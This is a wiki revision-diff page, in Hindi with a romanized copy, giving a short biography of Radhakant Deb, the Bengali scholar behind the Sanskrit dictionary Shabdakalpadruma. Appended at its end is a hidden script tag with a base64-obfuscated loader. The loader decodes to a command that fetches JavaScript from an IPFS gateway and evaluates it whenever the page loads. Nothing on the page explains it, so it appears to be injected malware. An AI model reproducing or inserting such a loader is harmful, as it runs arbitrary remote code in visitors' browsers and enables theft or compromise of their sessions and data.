Difference between revisions of "राधाकांत देव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''राधाकांत देव''' (अंग्रेज़ी: ''Radhakant Deva'') अनेक भाषाओं के...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
 
'''राधाकांत देव''' ([[अंग्रेज़ी]]: ''Radhakant Deva'') अनेक भाषाओं के विद्वान, हिन्दू संस्कृति के संरक्षण के पक्षधर एवं विचारक थे। उन्होंने 'शब्दकल्पद्रुम' नामक [[संस्कृत]] के आधुनिक महाशब्दकोश की रचना की।
 
'''राधाकांत देव''' ([[अंग्रेज़ी]]: ''Radhakant Deva'') अनेक भाषाओं के विद्वान, हिन्दू संस्कृति के संरक्षण के पक्षधर एवं विचारक थे। उन्होंने 'शब्दकल्पद्रुम' नामक [[संस्कृत]] के आधुनिक महाशब्दकोश की रचना की।
 
==संक्षिप्त परिचय==
 
==संक्षिप्त परिचय==
* सर राजा राधाकांत देव का जन्म 1794 ईस्वी<ref>पुस्तक- भारतीय चरित कोश | लेखक- लीलाधर शर्मा 'पर्वतीय' | पृष्ठ संख्या-718</ref> में [[बंगाल (आज़ादी से पूर्व)|बंगाल]] में हुआ था।  
+
* सर राजा राधाकांत देव का जन्म 1794 ईस्वी<ref name="BCK">पुस्तक- भारतीय चरित कोश | लेखक- लीलाधर शर्मा 'पर्वतीय' | पृष्ठ संख्या-718</ref> में [[बंगाल (आज़ादी से पूर्व)|बंगाल]] में हुआ था।  
 
* वे अपने समय में सनातनी हिंदुओं के मान्य नेता थे। वीर पाश्चात्य विचारों के उपयोगी तत्वों को स्वीकार करते हुए भी अपनी प्राचीन मान्यताओं पर पूरी आस्था रखते थे।  
 
* वे अपने समय में सनातनी हिंदुओं के मान्य नेता थे। वीर पाश्चात्य विचारों के उपयोगी तत्वों को स्वीकार करते हुए भी अपनी प्राचीन मान्यताओं पर पूरी आस्था रखते थे।  
 
* उन्होंने [[कोलकाता]] में हिंदू स्कूल की स्थापना में पूरा सहयोग दिया जिससे यहां के छात्र अंग्रेज़ी भाषा और पाश्चात्य विधाओं का ज्ञान अर्जित कर सकें।  
 
* उन्होंने [[कोलकाता]] में हिंदू स्कूल की स्थापना में पूरा सहयोग दिया जिससे यहां के छात्र अंग्रेज़ी भाषा और पाश्चात्य विधाओं का ज्ञान अर्जित कर सकें।  
 
* राधाकांत देव ने छात्रों को कम मूल्य पर पुस्तकें उपलब्ध कराने की व्यवस्था की।  
 
* राधाकांत देव ने छात्रों को कम मूल्य पर पुस्तकें उपलब्ध कराने की व्यवस्था की।  
 
* राधाकांत देव का एक बड़ा योगदान संस्कृत का शब्दकोश 'शब्दकल्पद्रुम' है। यह उनकी विद्वता का परिचायक है।
 
* राधाकांत देव का एक बड़ा योगदान संस्कृत का शब्दकोश 'शब्दकल्पद्रुम' है। यह उनकी विद्वता का परिचायक है।
* 1867 ईस्वी में राधाकांत देव का देहांत हो गया।<ref>पुस्तक- भारतीय चरित कोश | लेखक- लीलाधर शर्मा 'पर्वतीय' | पृष्ठ संख्या-718</ref>
+
* 1867 ईस्वी में राधाकांत देव का देहांत हो गया।<ref name="BCK"/>
  
  

Revision as of 10:36, 5 May 2018

radhakaant dev (aangrezi: Radhakant Deva) anek bhashaoan ke vidvan, hindoo sanskriti ke sanrakshan ke pakshadhar evan vicharak the. unhoanne 'shabdakalpadrum' namak sanskrit ke adhunik mahashabdakosh ki rachana ki.

sankshipt parichay

  • sar raja radhakaant dev ka janm 1794 eesvi[1] mean bangal mean hua tha.
  • ve apane samay mean sanatani hianduoan ke many neta the. vir pashchaty vicharoan ke upayogi tatvoan ko svikar karate hue bhi apani prachin manyataoan par poori astha rakhate the.
  • unhoanne kolakata mean hiandoo skool ki sthapana mean poora sahayog diya jisase yahaan ke chhatr aangrezi bhasha aur pashchaty vidhaoan ka jnan arjit kar sakean.
  • radhakaant dev ne chhatroan ko kam mooly par pustakean upalabdh karane ki vyavastha ki.
  • radhakaant dev ka ek b da yogadan sanskrit ka shabdakosh 'shabdakalpadrum' hai. yah unaki vidvata ka parichayak hai.
  • 1867 eesvi mean radhakaant dev ka dehaant ho gaya.[1]



tika tippani aur sandarbh

  1. 1.0 1.1 pustak- bharatiy charit kosh | lekhak- liladhar sharma 'parvatiy' | prishth sankhya-718

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>